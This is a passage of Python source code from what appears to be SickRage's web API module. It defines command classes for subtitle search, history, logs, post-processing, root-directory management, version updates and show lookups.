self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for an episode subtitles """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
# retrieve the episode object and fail if we can't get one
epObj = showObj.getEpisode(int(self.s), int(self.e))
if isinstance(epObj, str):
return _responds(RESULT_FAILURE, msg="Episode not found")
# try do download subtitles for that episode
previous_subtitles = epObj.subtitles
try:
subtitles = epObj.downloadSubtitles()
except:
return _responds(RESULT_FAILURE, msg='Unable to find subtitles')
# return the correct json value
newSubtitles = frozenset(epObj.subtitles).difference(previous_subtitles)
if newSubtitles:
newLangs = [subtitles.fromietf(newSub) for newSub in newSubtitles]
status = 'New subtitles downloaded: %s' % ', '.join([newLang.name for newLang in newLangs])
response = _responds(RESULT_SUCCESS, msg='New subtitles found')
else:
status = 'No subtitles downloaded'
response = _responds(RESULT_FAILURE, msg='Unable to find subtitles')
ui.notifications.message('Subtitles Search', status)
return response
class CMD_Exceptions(ApiCall):
_help = {
"desc": "Get the scene exceptions for all or a given show",
"optionalParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the scene exceptions for all or a given show """
myDB = db.DBConnection("cache.db", row_type="dict")
if self.indexerid == None:
sqlResults = myDB.select("SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions")
scene_exceptions = {}
for row in sqlResults:
indexerid = row["indexerid"]
if not indexerid in scene_exceptions:
scene_exceptions[indexerid] = []
scene_exceptions[indexerid].append(row["show_name"])
else:
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
sqlResults = myDB.select(
"SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions WHERE indexer_id = ?",
[self.indexerid])
scene_exceptions = []
for row in sqlResults:
scene_exceptions.append(row["show_name"])
return _responds(RESULT_SUCCESS, scene_exceptions)
class CMD_History(ApiCall):
_help = {
"desc": "Get the downloaded and/or snatched history",
"optionalParameters": {
"limit": {"desc": "The maximum number of results to return"},
"type": {"desc": "Only get some entries. No value will returns every type"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
self.type, args = self.check_params(args, kwargs, "type", None, False, "string", ["downloaded", "snatched"])
self.type = self.type.lower() if isinstance(self.type, str) else ''
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the downloaded and/or snatched history """
data = History().get(self.limit, self.type)
results = []
for row in data:
status, quality = Quality.splitCompositeStatus(int(row["action"]))
status = _get_status_Strings(status)
if self.type and not status.lower() == self.type:
continue
row["status"] = status
row["quality"] = get_quality_string(quality)
row["date"] = _historyDate_to_dateTimeForm(str(row["date"]))
del row["action"]
_rename_element(row, "show_id", "indexerid")
row["resource_path"] = os.path.dirname(row["resource"])
row["resource"] = os.path.basename(row["resource"])
# Add tvdbid for backward compatibility
row['tvdbid'] = row['indexerid']
results.append(row)
return _responds(RESULT_SUCCESS, results)
class CMD_HistoryClear(ApiCall):
_help = {"desc": "Clear the entire history"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Clear the entire history """
History().clear()
return _responds(RESULT_SUCCESS, msg="History cleared")
class CMD_HistoryTrim(ApiCall):
_help = {"desc": "Trim history entries older than 30 days"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Trim history entries older than 30 days """
History().trim()
return _responds(RESULT_SUCCESS, msg='Removed history entries older than 30 days')
class CMD_Failed(ApiCall):
_help = {
"desc": "Get the failed downloads",
"optionalParameters": {
"limit": {"desc": "The maximum number of results to return"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the failed downloads """
myDB = db.DBConnection('failed.db', row_type="dict")
ulimit = min(int(self.limit), 100)
if ulimit == 0:
sqlResults = myDB.select("SELECT * FROM failed")
else:
sqlResults = myDB.select("SELECT * FROM failed LIMIT ?", [ulimit])
return _responds(RESULT_SUCCESS, sqlResults)
class CMD_Backlog(ApiCall):
_help = {"desc": "Get the backlogged episodes"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the backlogged episodes """
shows = []
myDB = db.DBConnection(row_type="dict")
for curShow in sickbeard.showList:
showEps = []
sqlResults = myDB.select(
"SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC",
[curShow.indexerid])
for curResult in sqlResults:
curEpCat = curShow.getOverview(int(curResult["status"] or -1))
if curEpCat and curEpCat in (Overview.WANTED, Overview.QUAL):
showEps.append(curResult)
if showEps:
shows.append({
"indexerid": curShow.indexerid,
"show_name": curShow.name,
"status": curShow.status,
"episodes": showEps
})
return _responds(RESULT_SUCCESS, shows)
class CMD_Logs(ApiCall):
_help = {
"desc": "Get the logs",
"optionalParameters": {
"min_level": {
"desc":
"The minimum level classification of log entries to return. "
"Each level inherits its above levels: debug < info < warning < error"
},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.min_level, args = self.check_params(args, kwargs, "min_level", "error", False, "string",
["error", "warning", "info", "debug"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the logs """
# 10 = Debug / 20 = Info / 30 = Warning / 40 = Error
minLevel = logger.reverseNames[str(self.min_level).upper()]
data = []
if os.path.isfile(logger.logFile):
with ek(codecs.open, *[logger.logFile, 'r', 'utf-8']) as f:
data = f.readlines()
regex = "^(\d\d\d\d)\-(\d\d)\-(\d\d)\s*(\d\d)\:(\d\d):(\d\d)\s*([A-Z]+)\s*(.+?)\s*\:\:\s*(.*)$"
finalData = []
numLines = 0
lastLine = False
numToShow = min(50, len(data))
for x in reversed(data):
match = re.match(regex, x)
if match:
level = match.group(7)
if level not in logger.reverseNames:
lastLine = False
continue
if logger.reverseNames[level] >= minLevel:
lastLine = True
finalData.append(x.rstrip("\n"))
else:
lastLine = False
continue
elif lastLine:
finalData.append("AA" + x)
numLines += 1
if numLines >= numToShow:
break
return _responds(RESULT_SUCCESS, finalData)
class CMD_PostProcess(ApiCall):
_help = {
"desc": "Manually post-process the files in the download folder",
"optionalParameters": {
"path": {"desc": "The path to the folder to post-process"},
"force_replace": {"desc": "Force already post-processed files to be post-processed again"},
"return_data": {"desc": "Returns the result of the post-process"},
"process_method": {"desc": "How should valid post-processed files be handled"},
"is_priority": {"desc": "Replace the file even if it exists in a higher quality"},
"failed": {"desc": "Mark download as failed"},
"type": {"desc": "The type of post-process being requested"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.path, args = self.check_params(args, kwargs, "path", None, False, "string", [])
self.force_replace, args = self.check_params(args, kwargs, "force_replace", False, False, "bool", [])
self.return_data, args = self.check_params(args, kwargs, "return_data", False, False, "bool", [])
self.process_method, args = self.check_params(args, kwargs, "process_method", False, False, "string",
["copy", "symlink", "hardlink", "move"])
self.is_priority, args = self.check_params(args, kwargs, "is_priority", False, False, "bool", [])
self.failed, args = self.check_params(args, kwargs, "failed", False, False, "bool", [])
self.type, args = self.check_params(args, kwargs, "type", "auto", None, "string", ["auto", "manual"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Manually post-process the files in the download folder """
if not self.path and not sickbeard.TV_DOWNLOAD_DIR:
return _responds(RESULT_FAILURE, msg="You need to provide a path or set TV Download Dir")
if not self.path:
self.path = sickbeard.TV_DOWNLOAD_DIR
if not self.type:
self.type = 'manual'
data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace,
is_priority=self.is_priority, failed=self.failed, type=self.type)
if not self.return_data:
data = ""
return _responds(RESULT_SUCCESS, data=data, msg="Started postprocess for %s" % self.path)
class CMD_SickBeard(ApiCall):
_help = {"desc": "Get miscellaneous information about SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" dGet miscellaneous information about SickRage """
data = {"sr_version": sickbeard.BRANCH, "api_version": self.version,
"api_commands": sorted(function_mapper.keys())}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardAddRootDir(ApiCall):
_help = {
"desc": "Add a new root (parent) directory to SickRage",
"requiredParameters": {
"location": {"desc": "The full path to the new root (parent) directory"},
},
"optionalParameters": {
"default": {"desc": "Make this new location the default root (parent) directory"},
}
}
def __init__(self, args, kwargs):
# required
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
self.default, args = self.check_params(args, kwargs, "default", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add a new root (parent) directory to SickRage """
self.location = urllib.unquote_plus(self.location)
location_matched = 0
index = 0
# dissallow adding/setting an invalid dir
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg="Location is invalid")
root_dirs = []
if sickbeard.ROOT_DIRS == "":
self.default = 1
else:
root_dirs = sickbeard.ROOT_DIRS.split('|')
index = int(sickbeard.ROOT_DIRS.split('|')[0])
root_dirs.pop(0)
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
for x in root_dirs:
if (x == self.location):
location_matched = 1
if (self.default == 1):
index = root_dirs.index(self.location)
break
if (location_matched == 0):
if (self.default == 1):
root_dirs.insert(0, self.location)
else:
root_dirs.append(self.location)
root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs]
root_dirs_new.insert(0, index)
root_dirs_new = '|'.join(unicode(x) for x in root_dirs_new)
sickbeard.ROOT_DIRS = root_dirs_new
return _responds(RESULT_SUCCESS, _getRootDirs(), msg="Root directories updated")
class CMD_SickBeardCheckVersion(ApiCall):
_help = {"desc": "Check if a new version of SickRage is available"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
checkversion = CheckVersion()
needs_update = checkversion.check_for_new_version()
data = {
"current_version": {
"branch": checkversion.get_branch(),
"commit": checkversion.updater.get_cur_commit_hash(),
"version": checkversion.updater.get_cur_version(),
},
"latest_version": {
"branch": checkversion.get_branch(),
"commit": checkversion.updater.get_newest_commit_hash(),
"version": checkversion.updater.get_newest_version(),
},
"commits_offset": checkversion.updater.get_num_commits_behind(),
"needs_update": needs_update,
}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardCheckScheduler(ApiCall):
_help = {"desc": "Get information about the scheduler"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get information about the scheduler """
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT last_backlog FROM info")
backlogPaused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable
backlogRunning = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable
nextBacklog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING)
data = {"backlog_is_paused": int(backlogPaused), "backlog_is_running": int(backlogRunning),
"last_backlog": _ordinal_to_dateForm(sqlResults[0]["last_backlog"]),
"next_backlog": nextBacklog}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardDeleteRootDir(ApiCall):
_help = {
"desc": "Delete a root (parent) directory from SickRage",
"requiredParameters": {
"location": {"desc": "The full path to the root (parent) directory to remove"},
}
}
def __init__(self, args, kwargs):
# required
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Delete a root (parent) directory from SickRage """
if sickbeard.ROOT_DIRS == "":
return _responds(RESULT_FAILURE, _getRootDirs(), msg="No root directories detected")
newIndex = 0
root_dirs_new = []
root_dirs = sickbeard.ROOT_DIRS.split('|')
index = int(root_dirs[0])
root_dirs.pop(0)
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
old_root_dir = root_dirs[index]
for curRootDir in root_dirs:
if not curRootDir == self.location:
root_dirs_new.append(curRootDir)
else:
newIndex = 0
for curIndex, curNewRootDir in enumerate(root_dirs_new):
if curNewRootDir is old_root_dir:
newIndex = curIndex
break
root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new]
if len(root_dirs_new) > 0:
root_dirs_new.insert(0, newIndex)
root_dirs_new = "|".join(unicode(x) for x in root_dirs_new)
sickbeard.ROOT_DIRS = root_dirs_new
# what if the root dir was not found?
return _responds(RESULT_SUCCESS, _getRootDirs(), msg="Root directory deleted")
class CMD_SickBeardGetDefaults(ApiCall):
_help = {"desc": "Get SickRage's user default configuration value"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get SickRage's user default configuration value """
anyQualities, bestQualities = _mapQuality(sickbeard.QUALITY_DEFAULT)
data = {"status": statusStrings[sickbeard.STATUS_DEFAULT].lower(),
"flatten_folders": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), "initial": anyQualities,
"archive": bestQualities, "future_show_paused": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardGetMessages(ApiCall):
_help = {"desc": "Get all messages"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
messages = []
for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip):
messages.append({"title": cur_notification.title,
"message": cur_notification.message,
"type": cur_notification.type})
return _responds(RESULT_SUCCESS, messages)
class CMD_SickBeardGetRootDirs(ApiCall):
_help = {"desc": "Get all root (parent) directories"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get all root (parent) directories """
return _responds(RESULT_SUCCESS, _getRootDirs())
class CMD_SickBeardPauseBacklog(ApiCall):
_help = {
"desc": "Pause or unpause the backlog search",
"optionalParameters": {
"pause ": {"desc": "True to pause the backlog search, False to unpause it"}
}
}
def __init__(self, args, kwargs):
# required
# optional
self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Pause or unpause the backlog search """
if self.pause:
sickbeard.searchQueueScheduler.action.pause_backlog() # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg="Backlog paused")
else:
sickbeard.searchQueueScheduler.action.unpause_backlog() # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg="Backlog unpaused")
class CMD_SickBeardPing(ApiCall):
_help = {"desc": "Ping SickRage to check if it is running"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Ping SickRage to check if it is running """
if sickbeard.started:
return _responds(RESULT_SUCCESS, {"pid": sickbeard.PID}, "Pong")
else:
return _responds(RESULT_SUCCESS, msg="Pong")
class CMD_SickBeardRestart(ApiCall):
_help = {"desc": "Restart SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Restart SickRage """
if not Restart.restart(sickbeard.PID):
return _responds(RESULT_FAILURE, msg='SickRage can not be restarted')
return _responds(RESULT_SUCCESS, msg="SickRage is restarting...")
class CMD_SickBeardSearchIndexers(ApiCall):
_help = {
"desc": "Search for a show with a given name on all the indexers, in a specific language",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"indexerid": {"desc": "Unique ID of a show"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
# required
# optional
self.name, args = self.check_params(args, kwargs, "name", None, False, "string", [])
self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
self.valid_languages.keys())
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for a show with a given name on all the indexers, in a specific language """
results = []
lang_id = self.valid_languages[self.lang]
if self.name and not self.indexerid: # only name was given
for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
lINDEXER_API_PARMS = sickbeard.indexerApi(_indexer).api_params.copy()
if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
lINDEXER_API_PARMS['language'] = self.lang
lINDEXER_API_PARMS['actors'] = False
lINDEXER_API_PARMS['custom_ui'] = classes.AllShowsListUI
t = sickbeard.indexerApi(_indexer).indexer(**lINDEXER_API_PARMS)
try:
apiData = t[str(self.name).encode()]
except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
continue
for curSeries in apiData:
results.append({indexer_ids[_indexer]: int(curSeries['id']),
"name": curSeries['seriesname'],
"first_aired": curSeries['firstaired'],
"indexer": int(_indexer)})
return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
elif self.indexerid:
for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
lINDEXER_API_PARMS = sickbeard.indexerApi(_indexer).api_params.copy()
if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
lINDEXER_API_PARMS['language'] = self.lang
lINDEXER_API_PARMS['actors'] = False
t = sickbeard.indexerApi(_indexer).indexer(**lINDEXER_API_PARMS)
try:
myShow = t[int(self.indexerid)]
except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
return _responds(RESULT_SUCCESS, {"results": [], "langid": lang_id})
if not myShow.data['seriesname']:
logger.log(
u"API :: Found show with indexerid: " + str(
self.indexerid) + ", however it contained no show name", logger.DEBUG)
return _responds(RESULT_FAILURE, msg="Show contains no name, invalid result")
# found show
results = [{indexer_ids[_indexer]: int(myShow.data['id']),
"name": unicode(myShow.data['seriesname']),
"first_aired": myShow.data['firstaired'],
"indexer": int(_indexer)}]
break
return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
else:
return _responds(RESULT_FAILURE, msg="Either a unique id or name is required!")
class CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers):
_help = {
"desc": "Search for a show with a given name on The TVDB, in a specific language",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
CMD_SickBeardSearchIndexers.__init__(self, args, kwargs)
self.indexerid, args = self.check_params(args, kwargs, "tvdbid", None, False, "int", [])
class CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers):
"""
Deprecated, TVRage is no more.
"""
_help = {
"desc":
"Search for a show with a given name on TVRage, in a specific language. "
"This command should not longer be used, as TVRage was shut down.",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
ApiCall.__init__(self, args, kwargs)
def run(self):
return _responds(RESULT_FAILURE, msg="TVRage is no more, invalid result")
class CMD_SickBeardSetDefaults(ApiCall):
_help = {
"desc": "Set SickRage's user default configuration value",
"optionalParameters": {
"initial": {"desc": "The initial quality of a show"},
"archive": {"desc": "The archive quality of a show"},
"future_show_paused": {"desc": "True to list paused shows in the coming episode, False otherwise"},
"flatten_folders": {"desc": "Flatten sub-folders within the show directory"},
"status": {"desc": "Status of missing episodes"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.future_show_paused, args = self.check_params(args, kwargs, "future_show_paused", None, False, "bool", [])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders", None, False, "bool", [])
self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
["wanted", "skipped", "ignored"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set SickRage's user default configuration value """
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
iqualityID = []
aqualityID = []
if self.initial:
for quality in self.initial:
iqualityID.append(quality_map[quality])
if self.archive:
for quality in self.archive:
aqualityID.append(quality_map[quality])
if iqualityID or aqualityID:
sickbeard.QUALITY_DEFAULT = Quality.combineQualities(iqualityID, aqualityID)
if self.status:
# convert the string status to a int
for status in statusStrings.statusStrings:
if statusStrings[status].lower() == str(self.status).lower():
self.status = status
break
# this should be obsolete bcause of the above
if not self.status in statusStrings.statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.status) not in (3, 5, 6, 7):
raise ApiError("Status Prohibited")
sickbeard.STATUS_DEFAULT = self.status
if self.flatten_folders != None:
sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders)
if self.future_show_paused != None:
sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused)
return _responds(RESULT_SUCCESS, msg="Saved defaults")
class CMD_SickBeardShutdown(ApiCall):
_help = {"desc": "Shutdown SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Shutdown SickRage """
if not Shutdown.stop(sickbeard.PID):
return _responds(RESULT_FAILURE, msg='SickRage can not be shut down')
return _responds(RESULT_SUCCESS, msg="SickRage is shutting down...")
class CMD_SickBeardUpdate(ApiCall):
_help = {"desc": "Update SickRage to the latest version available"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
checkversion = CheckVersion()
if checkversion.check_for_new_version():
if checkversion.run_backup_if_safe():
checkversion.update()
return _responds(RESULT_SUCCESS, msg="SickRage is updating ...")
return _responds(RESULT_FAILURE, msg="SickRage could not backup config ...")
return _responds(RESULT_FAILURE, msg="SickRage is already up to date")
class CMD_Show(ApiCall):
_help = {
"desc": "Get detailed information about a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get detailed information about a show """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if not showObj:
return _responds(RESULT_FAILURE, msg="Show not found")
showDict = {}
showDict["season_list"] = CMD_ShowSeasonList((), {"indexerid": self.indexerid}).run()["data"]
showDict["cache"] = CMD_ShowCache((), {"indexerid": self.indexerid}).run()["data"]
genreList = []
if showObj.genre:
genreListTmp = showObj.genre.split("|")
for genre in genreListTmp:
if genre:
genreList.append(genre)
showDict["genre"] = genreList
showDict["quality"] = get_quality_string(showObj.quality)
anyQualities, bestQualities = _mapQuality(showObj.quality)
showDict["quality_details"] = {"initial": anyQualities, "archive": bestQualities}
try:
showDict["location"] = showObj.location
except ShowDirectoryNotFoundException:
showDict["location"] = ""
showDict["language"] = showObj.lang
showDict["show_name"] = showObj.name
showDict["paused"] = (0, 1)[showObj.paused]
showDict["subtitles"] = (0, 1)[showObj.subtitles]
showDict["air_by_date"] = (0, 1)[showObj.air_by_date]
showDict["flatten_folders"] = (0, 1)[showObj.flatten_folders]
showDict["sports"] = (0, 1)[showObj.sports]
showDict["anime"] = (0, 1)[showObj.anime]
showDict["airs"] = str(showObj.airs).replace('am', ' AM').replace('pm', ' PM').replace(' ', ' ')
showDict["dvdorder"] = (0, 1)[showObj.dvdorder]
if showObj.rls_require_words:
showDict["rls_require_words"] = showObj.rls_require_words.split(", ")
else:
showDict["rls_require_words"] = []
if showObj.rls_ignore_words:
showDict["rls_ignore_words"] = showObj.rls_ignore_words.split(", ")
else:
showDict["rls_ignore_words"] = []
showDict["scene"] = (0, 1)[showObj.scene]
showDict["archive_firstmatch"] = (0, 1)[showObj.archive_firstmatch]
showDict["indexerid"] = showObj.indexerid
showDict["tvdbid"] = helpers.mapIndexersToShow(showObj)[1]
showDict["imdbid"] = showObj.imdbid
showDict["network"] = showObj.network
if not showDict["network"]:
showDict["network"] = ""
showDict["status"] = showObj.status
if showObj.nextaired:
dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(showObj.nextaired, showDict['airs'], showDict['network']))
showDict['airs'] = sbdatetime.sbdatetime.sbftime(dtEpisodeAirs, t_preset=timeFormat).lstrip('0').replace(
' 0', ' ')
showDict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
else:
showDict['next_ep_airdate'] = ''
return _responds(RESULT_SUCCESS, showDict)
class CMD_ShowAddExisting(ApiCall):
_help = {
"desc": "Add an existing show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"location": {"desc": "Full path to the existing shows's folder"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"archive": {"desc": "The archive quality of the show"},
"flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
"subtitles": {"desc": "True to search for subtitles, False otherwise"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "", [])
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
self.subtitles, args = self.check_params(args, kwargs, "subtitles", int(sickbeard.USE_SUBTITLES),
False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add an existing show in SickRage """
showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
if showObj:
return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in the database")
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg='Not a valid location')
indexerName = None
indexerResult = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
if indexerResult['result'] == result_type_map[RESULT_SUCCESS]:
if not indexerResult['data']['results']:
return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
if len(indexerResult['data']['results']) == 1 and 'name' in indexerResult['data']['results'][0]:
indexerName = indexerResult['data']['results'][0]['name']
if not indexerName:
return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
# set indexer so we can pass it along when adding show to SR
indexer = indexerResult['data']['results'][0]['indexer']
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a failsafe
newQuality = int(sickbeard.QUALITY_DEFAULT)
iqualityID = []
aqualityID = []
if self.initial:
for quality in self.initial:
iqualityID.append(quality_map[quality])
if self.archive:
for quality in self.archive:
aqualityID.append(quality_map[quality])
if iqualityID or aqualityID:
newQuality = Quality.combineQualities(iqualityID, aqualityID)
sickbeard.showQueueScheduler.action.addShow(int(indexer), int(self.indexerid), self.location, SKIPPED,
newQuality, int(self.flatten_folders))
return _responds(RESULT_SUCCESS, {"name": indexerName}, indexerName + " has been queued to be added")
class CMD_ShowAddNew(ApiCall):
_help = {
"desc": "Add a new show to SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
